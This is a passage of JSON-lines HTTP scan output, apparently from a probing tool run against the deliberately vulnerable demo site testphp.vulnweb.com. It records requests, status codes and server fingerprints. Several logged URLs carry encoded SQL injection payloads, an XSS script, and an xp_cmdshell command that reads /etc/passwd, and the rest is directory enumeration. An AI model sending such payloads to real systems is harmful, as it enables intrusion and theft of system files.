page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php?id=1%27%29%20AND%20%28SELECT%20NULLIFZERO%28hashcode%28NULL%29%29%29%20IS%20NULL%20AND%20%28%27KPgJ%27%3D%27KPgJ\",\"time\":\"345.106141ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:06.865197352Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.php?id=1%27%29%20AND%205111%3D4026%20AND%20%28%27haFZ%27%3D%27haFZ\",\"input\":\"http://testphp.vulnweb.com/login.php?id=1%27%29%20AND%205111%3D4026%20AND%20%28%27haFZ%27%3D%27haFZ\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php?id=1%27%29%20AND%205111%3D4026%20AND%20%28%27haFZ%27%3D%27haFZ\",\"time\":\"376.297893ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:06.924817102Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.php?id=1%27%29%20AND%206038%3D6038%20AND%20%28%27dpXP%27%3D%27dpXP\",\"input\":\"http://testphp.vulnweb.com/login.php?id=1%27%29%20AND%206038%3D6038%20AND%20%28%27dpXP%27%3D%27dpXP\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php?id=1%27%29%20AND%206038%3D6038%20AND%20%28%27dpXP%27%3D%27dpXP\",\"time\":\"348.260133ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:10.186353449Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.php?id=1%2C%22%29.%28.%29.%27%29\",\"input\":\"http://testphp.vulnweb.com/login.php?id=1%2C%22%29.%28.%29.%27%29\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php?id=1%2C%22%29.%28.%29.%27%29\",\"time\":\"352.970111ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:10.305327217Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.php?id=1\\u0026NtFH=4809%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"input\":\"http://testphp.vulnweb.com/login.php?id=1\\u0026NtFH=4809%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php?id=1\\u0026NtFH=4809%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"time\":\"349.287039ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:10.369709069Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.php?id=1\\u0026SlFY=4435%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"input\":\"http://testphp.vulnweb.com/login.php?id=1\\u0026SlFY=4435%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php?id=1\\u0026SlFY=4435%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"time\":\"351.788427ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:10.441571157Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.php?id=4851\",\"input\":\"http://testphp.vulnweb.com/login.php?id=4851\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php?id=4851\",\"time\":\"353.664856ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:10.79160997Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.phpA01\",\"input\":\"http://testphp.vulnweb.com/login.phpA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.phpA01\",\"time\":\"346.295245ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:11.178817654Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.phpCONFIRMED\",\"input\":\"http://testphp.vulnweb.com/login.phpCONFIRMED\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.phpCONFIRMED\",\"time\":\"352.068862ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:11.254738384Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.phpForm\",\"input\":\"http://testphp.vulnweb.com/login.phpForm\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.phpForm\",\"time\":\"342.928959ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:11.446377596Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.phpUser-Agent:\",\"input\":\"http://testphp.vulnweb.com/login.phpUser-Agent:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.phpUser-Agent:\",\"time\":\"351.921275ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:11.915592843Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.phphttps://modcom.pythonanywhere.com/\",\"input\":\"http://testphp.vulnweb.com/login.phphttps://modcom.pythonanywhere.com/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.phphttps://modcom.pythonanywhere.com/\",\"time\":\"352.419571ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:12.041790173Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.phphttps://modcom.pythonanywhere.com/http://www.altoromutual.com:8080/login.jsp\",\"input\":\"http://testphp.vulnweb.com/login.phphttps://modcom.pythonanywhere.com/http://www.altoromutual.com:8080/login.jsp\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.phphttps://modcom.pythonanywhere.com/http://www.altoromutual.com:8080/login.jsp\",\"time\":\"342.673477ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:13.707277999Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.phphttps://modcom.pythonanywhere.com/http://www.altoromutual.com:8080/login.jsphttps://juice-shop.herokuapp.com/\",\"input\":\"http://testphp.vulnweb.com/login.phphttps://modcom.pythonanywhere.com/http://www.altoromutual.com:8080/login.jsphttps://juice-shop.herokuapp.com/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.phphttps://modcom.pythonanywhere.com/http://www.altoromutual.com:8080/login.jsphttps://juice-shop.herokuapp.com/\",\"time\":\"346.332185ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:14.78503591Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/logout.phpCookie\",\"input\":\"http://testphp.vulnweb.com/logout.phpCookie\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/logout.phpCookie\",\"time\":\"352.194214ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:15.047560405Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/logout.phpSet-Cookie:\",\"input\":\"http://testphp.vulnweb.com/logout.phpSet-Cookie:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/logout.phpSet-Cookie:\",\"time\":\"339.674659ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:15.352547494Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/medias/\",\"input\":\"http://testphp.vulnweb.com/medias/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/medias/\",\"time\":\"355.728548ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:16.161807369Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/medias/css/\",\"input\":\"http://testphp.vulnweb.com/medias/css/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/medias/css/\",\"time\":\"357.223828ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:16.231881102Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/medias/img/\",\"input\":\"http://testphp.vulnweb.com/medias/img/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/medias/img/\",\"time\":\"349.689854ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:16.245157996Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/medias/css/main.css\",\"input\":\"http://testphp.vulnweb.com/medias/css/main.css\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/medias/css/main.css\",\"time\":\"359.763624ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:16.288325597Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/medias/js/\",\"input\":\"http://testphp.vulnweb.com/medias/js/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/medias/js/\",\"time\":\"344.405385ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:16.297671822Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/medias/img/pix.gif\",\"input\":\"http://testphp.vulnweb.com/medias/img/pix.gif\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/medias/img/pix.gif\",\"time\":\"352.581495ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:16.670796345Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/monsternutritiondepot.com\",\"input\":\"http://testphp.vulnweb.com/monsternutritiondepot.com\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/monsternutritiondepot.com\",\"time\":\"344.096036ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:16.671339994Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/medias/js/common_functions.js\",\"input\":\"http://testphp.vulnweb.com/medias/js/common_functions.js\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/medias/js/common_functions.js\",\"time\":\"346.107405ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:16.749277828Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictu\",\"input\":\"http://testphp.vulnweb.com/pictu\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictu\",\"time\":\"352.191617ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:16.789200537Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/\",\"input\":\"http://testphp.vulnweb.com/pictures/\",\"title\":\"Index of /pictures/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/\",\"time\":\"348.71874ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1318,\"lines\":29,\"status_code\":200,\"content_length\":2669,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:16.881276787Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg\",\"input\":\"http://testphp.vulnweb.com/pictures/1.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/1.jpg\",\"time\":\"352.80914ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":53,\"lines\":61,\"status_code\":200,\"content_length\":12426,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:16.914729546Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg\\u0026size=160\",\"input\":\"http://testphp.vulnweb.com/pictures/1.jpg\\u0026size=160\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/1.jpg\\u0026size=160\",\"time\":\"347.149171ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:16.978972725Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"input\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/1.jpg.tn\",\"time\":\"354.632583ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":20,\"lines\":27,\"status_code\":200,\"content_length\":4355,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:17.083432274Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg\",\"input\":\"http://testphp.vulnweb.com/pictures/2.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/2.jpg\",\"time\":\"343.82285ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":24,\"lines\":17,\"status_code\":200,\"content_length\":3324,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:17.119586932Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg\\u0026size=160\",\"input\":\"http://testphp.vulnweb.com/pictures/2.jpg\\u0026size=160\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/2.jpg\\u0026size=160\",\"time\":\"346.871985ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:17.22388244Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"input\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/2.jpg.tn\",\"time\":\"352.950764ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":12,\"status_code\":200,\"content_length\":1353,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:17.300222802Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg\",\"input\":\"http://testphp.vulnweb.com/pictures/3.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/3.jpg\",\"time\":\"353.156027ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":55,\"lines\":55,\"status_code\":200,\"content_length\":9692,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:20.537224851Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg\\u0026size=160\",\"input\":\"http://testphp.vulnweb.com/pictures/3.jpg\\u0026size=160\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/3.jpg\\u0026size=160\",\"time\":\"346.779873ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:20.672370429Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"input\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/3.jpg.tn\",\"time\":\"357.754162ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":20,\"lines\":19,\"status_code\":200,\"content_length\":3725,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:20.766214702Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg\",\"input\":\"http://testphp.vulnweb.com/pictures/4.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/4.jpg\",\"time\":\"350.935537ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":65,\"lines\":72,\"status_code\":200,\"content_length\":13969,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:20.79826983Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg\\u0026size=160\",\"input\":\"http://testphp.vulnweb.com/pictures/4.jpg\\u0026size=160\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/4.jpg\\u0026size=160\",\"time\":\"352.809938ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:21.151229034Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"input\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/4.jpg.tn\",\"time\":\"348.371831ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":21,\"lines\":25,\"status_code\":200,\"content_length\":4615,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:21.572629028Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg\",\